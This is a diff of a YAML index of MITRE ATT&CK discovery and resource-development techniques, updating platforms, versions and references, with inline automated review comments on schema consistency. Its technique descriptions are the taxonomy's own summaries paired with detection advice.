+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
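Review bot: T1087.004's platform list changes from `Azure AD`, `Office 365`, `SaaS`, `IaaS`, `Google Workspace` to `SaaS`, `IaaS`, `Office Suite`, `Identity Provider`, which changes which per-platform indexes this technique belongs to; confirm that every index derived from the platform list was regenerated in the same change rather than hand-edited, and that nothing still keys on the old `Azure AD` or `Google Workspace` names (T1201 below gains the same new platform values). The hunk also drops `x_mitre_permissions_required: - User` without replacement, consistent with the other migrated objects, and the `x_mitre_version` bump from 1.2 to 1.3 should be recorded as an upstream change in the commit message.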
@@ -51069,46 +51760,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -51132,6 +51788,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -51142,9 +51801,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -51154,12 +51818,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -51202,12 +51893,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -51218,28 +51908,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -51272,9 +51965,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests:
- name: Examine AWS Password Policy
@@ -51342,7 +52034,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -51381,13 +52073,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
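Review bot: T1614.001 is left without any `x_mitre_attack_spec_version` in this hunk: `x_mitre_attack_spec_version: 2.1.0` is removed together with `spec_version: '2.1'` but, unlike every other object in this change, no `3.2.0` line is added, and the object still carries `x_mitre_permissions_required: - User`, which the sibling T1614 and T1087.004 hunks drop. Together with its `modified` date moving back to 2021-10-15 in the previous hunk, this suggests T1614.001 was regenerated from an older source object than its neighbours; please confirm, unless the field was simply moved earlier in the object outside this hunk.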
@@ -51428,87 +52118,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
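Review bot: the FBI Ragnar Locker reference changes host, from `assets.documentcloud.org` to `s3.documentcloud.org`, with the retrieval date updated to September 12, 2024, so check that the new link serves the same PDF; the rest of this hunk is the same reorder-plus-field-migration seen above (`x_mitre_permissions_required` dropped, `revoked: false` and `x_mitre_attack_spec_version: 3.2.0` added, `x_mitre_version` 1.0 to 1.1). Note also that the block-scalar continuation lines `can also be used to determine the locale of the host.` and `to gather information.(Citation: FBI Ragnar Locker 2020)` appear without a `+` or `-` marker in both the removed and the added copies, so whoever applies this patch should confirm those lines kept their indentation inside the `description` and `x_mitre_detection` scalars.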
@@ -51561,17 +52249,16 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518.001
atomic_tests: []
T1526:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Cloud Service Discovery
description: |-
- An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+ An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
- Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
+ Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
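Review bot: the reworded description for T1526 now says "Microsoft Graph API" but keeps the `(Citation: Azure AD Graph API)` tag on the same sentence; check that the `external_references` entry with `source_name: Azure AD Graph API` (outside this hunk) still supports the claim, or that the tag is meant to stay while the prose names the successor API, so the citation and sentence do not drift apart.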
@@ -51579,10 +52266,12 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Praetorian
- Thanabodi Phrakhun, I-SECURE
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
@@ -51591,15 +52280,16 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Enumeration'
+ - 'Logon Session: Logon Session Creation'
type: attack-pattern
id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db
created: '2019-08-30T13:01:10.120Z'
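Review bot: `x_mitre_platforms` for T1526 drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (the same change is applied to T1538 further down), so any per-platform index derived from this field and keyed on the old platform strings must be regenerated or renamed in the same change, otherwise those indexes silently stop receiving these techniques. The version bump `'1.3'` to `'1.4'` and the added `'Logon Session: Logon Session Creation'` data source are consistent with that rename.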
@@ -51627,9 +52317,6 @@ discovery:
url: https://github.com/RhinoSecurityLabs/pacu
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1526
atomic_tests: []
T1018:
@@ -51704,7 +52391,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1018
atomic_tests: []
T1046:
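Review bot: `spec_version: '2.1'` is removed from every technique object in this patch (T1018 here, and likewise T1518.001, T1046, T1518, T1538, T1622, T1124 and all of the resource-development objects) with nothing replacing it; `spec_version` is a required common property on STIX 2.1 objects, so if any consumer validates these entries as STIX, or the index generator is expected to carry the bundle's value through, this should be a deliberate generator change called out in the commit message rather than a silent drop.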
@@ -51776,7 +52462,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1046
atomic_tests: []
T1518:
@@ -51825,12 +52510,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1518
atomic_tests: []
T1538:
technique:
- modified: '2024-04-19T04:25:33.300Z'
+ modified: '2024-10-15T15:51:56.279Z'
name: Cloud Service Dashboard
description: |-
An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
@@ -51851,12 +52535,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -51881,7 +52564,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1622:
technique:
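Review bot: the T1538 object ends at `atomic_tests: []` with no `identifier:` line, whereas the neighbouring discovery objects carry `identifier: T1518` and `identifier: T1622` immediately before `atomic_tests`; if `identifier` is what ties a technique entry to its atomic tests, T1538 needs one as well. The same is true of every resource-development object in this patch (T1583, T1583.007, T1588.007, T1584.008, T1583.008, T1588.004 and the rest all close with `x_mitre_modified_by_ref` straight into `atomic_tests: []`).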
@@ -51936,7 +52618,7 @@ discovery:
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent()
and NtQueryInformationProcess()
, or manually checking the BeingDebugged
flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW()
.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-16T15:05:55.918Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Debugger Evasion
x_mitre_detection: |-
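Review bot: the `modified` timestamp for T1622 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-16T15:05:55.918Z`, which is not what a refresh from a newer bundle should produce. The same regression appears for T1583.002, T1587.003, T1587.001, T1586.001, T1588.006, T1583.005, T1587.002 and T1584.003 later in this patch, and those are exactly the objects that keep the older key layout (`external_references` before `modified`, `spec_version` and `x_mitre_attack_spec_version: 2.1.0` at the end), so they look as if they were regenerated from a different, older source than T1526, T1583.007 or T1588.004; please confirm which bundle these objects came from before merging.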
@@ -51956,7 +52638,6 @@ discovery:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1622
atomic_tests: []
T1124:
@@ -52059,13 +52740,12 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1124
atomic_tests: []
resource-development:
T1583:
technique:
- modified: '2024-02-28T21:13:02.648Z'
+ modified: '2024-10-16T20:03:59.884Z'
name: Acquire Infrastructure
description: |-
Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.(Citation: Free Trial PurpleUrchin) Additionally, botnets are available for rent or purchase.
@@ -52076,7 +52756,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider use of services that may aid in tracking of newly
acquired infrastructure, such as WHOIS databases for domain registration information.
@@ -52147,29 +52827,28 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.007:
technique:
- modified: '2022-10-20T21:20:22.578Z'
+ modified: '2024-07-01T20:24:16.562Z'
name: Serverless
description: |-
- Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
+ Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
